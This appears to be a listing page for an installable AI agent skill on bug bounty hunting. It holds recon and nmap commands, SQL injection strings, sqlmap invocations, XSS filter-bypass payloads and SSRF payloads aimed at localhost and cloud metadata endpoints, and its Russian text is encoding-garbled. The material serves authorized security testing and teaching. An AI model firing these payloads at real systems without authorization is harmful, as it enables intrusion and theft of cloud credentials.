bug-bounty-program
37
总安装量
6
周安装量
#10204
全站排名
安装命令
npx skills add https://github.com/dengineproblem/agents-monorepo --skill bug-bounty-program
Agent 安装分布
gemini-cli
4
claude-code
4
codex
4
antigravity
3
github-copilot
3
Skill 文档
Bug Bounty Program Specialist
ÐкÑпеÑÑ Ð¿Ð¾ иÑÑÐ»ÐµÐ´Ð¾Ð²Ð°Ð½Ð¸Ñ ÑÑзвимоÑÑей и bug bounty hunting.
ÐеÑÐ¾Ð´Ð¾Ð»Ð¾Ð³Ð¸Ñ ÑеÑÑиÑованиÑ
OWASP Top 10 Focus
- Injection (SQL, NoSQL, LDAP, OS commands)
- Broken Authentication
- Sensitive Data Exposure
- XML External Entities (XXE)
- Broken Access Control
- Security Misconfiguration
- Cross-Site Scripting (XSS)
- Insecure Deserialization
- Using Components with Known Vulnerabilities
- Insufficient Logging & Monitoring
РаÑпÑеделение ÑÑилий
- Reconnaissance: 30%
- Manual testing: 50%
- Automated scanning: 20%
Reconnaissance
Subdomain Enumeration
# ÐаÑÑивное пеÑеÑиÑление
amass enum -passive -d target.com -o subdomains.txt
# ÐкÑивное пеÑеÑиÑление
subfinder -d target.com -all -o subfinder.txt
# DNS бÑÑÑÑоÑÑ
gobuster dns -d target.com -w wordlist.txt -o gobuster.txt
# ÐбÑединение ÑезÑлÑÑаÑов
cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt
Technology Stack Identification
# Wappalyzer CLI
wappalyzer https://target.com
# WhatWeb
whatweb -a 3 https://target.com
# Nuclei technology detection
nuclei -u https://target.com -t technologies/
Port Scanning
# ÐÑÑÑÑое ÑканиÑование
nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full
# СканиÑование ÑеÑвиÑов
nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services
SQL Injection Testing
Manual Detection
-- Error-based
' OR '1'='1
' AND '1'='2
' UNION SELECT NULL--
-- Time-based blind
'; WAITFOR DELAY '00:00:05'--
' OR SLEEP(5)--
-- Boolean-based blind
' AND 1=1--
' AND 1=2--
SQLMap
# Basic injection test
sqlmap -u "https://target.com/page?id=1" --batch
# With authentication
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch
# POST data
sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch
# Database enumeration
sqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch
XSS Testing
Payload Types
// Reflected XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
// DOM-based XSS
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
// Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>
// Stored XSS via different contexts
"><script>alert('XSS')</script>
'-alert('XSS')-'
</title><script>alert('XSS')</script>
Context-Specific Payloads
// In HTML attribute
" onfocus=alert('XSS') autofocus="
' onfocus=alert('XSS') autofocus='
// In JavaScript string
';alert('XSS');//
"-alert('XSS')-"
// In URL parameter
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
SSRF Testing
Basic Payloads
# Localhost bypass
http://127.0.0.1
http://localhost
http://[::1]
http://0.0.0.0
http://127.1
http://0177.0.0.1
# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/
Detection Methods
# Out-of-band detection using Burp Collaborator
url = "http://your-collaborator-id.burpcollaborator.net"
# Webhook.site for testing
url = "https://webhook.site/unique-id"
Report Writing
Structure
# Vulnerability Report
## Summary
[One-line description]
## Severity
[Critical/High/Medium/Low] - CVSS Score: X.X
## Affected Component
[URL/Endpoint/Feature]
## Description
[Detailed technical explanation]
## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step 3]
## Proof of Concept
[Screenshots, code, requests]
## Impact
[Business/technical impact]
## Remediation
[Specific recommendations]
## References
[CVE, OWASP, etc.]
CVSS Calculator Factors
- Attack Vector (AV): Network/Adjacent/Local/Physical
- Attack Complexity (AC): Low/High
- Privileges Required (PR): None/Low/High
- User Interaction (UI): None/Required
- Scope (S): Unchanged/Changed
- Confidentiality Impact (C): None/Low/High
- Integrity Impact (I): None/Low/High
- Availability Impact (A): None/Low/High
Tools Checklist
Reconnaissance
- Amass / Subfinder
- Nmap
- Shodan
- Google Dorks
Web Testing
- Burp Suite
- OWASP ZAP
- SQLMap
- Nuclei
Automation
- ffuf (fuzzing)
- httpx (probing)
- waybackurls
- gau (URLs gathering)
Ethical Guidelines
- Stay in scope â ÑеÑÑиÑÑйÑе ÑолÑко ÑазÑеÑеннÑе Ñели
- Don’t be destructive â избегайÑе DoS и поÑеÑи даннÑÑ
- Protect data â не ÑаÑпÑоÑÑÑанÑйÑе найденнÑе даннÑе
- Report responsibly â ÑледÑйÑе disclosure policy
- Document everything â ведиÑе деÑалÑнÑе запиÑи
- Respect rate limits â не пеÑегÑÑжайÑе ÑиÑÑемÑ
Program Selection Strategy
Criteria
- Response time history
- Bounty amounts
- Scope breadth
- Program maturity
- Community feedback
Priority Matrix
| Program Type | Skill Level | Potential |
|---|---|---|
| New programs | Any | High |
| Broad scope | Intermediate | Medium |
| Narrow scope | Expert | Low-Medium |
| VDP only | Beginner | Low |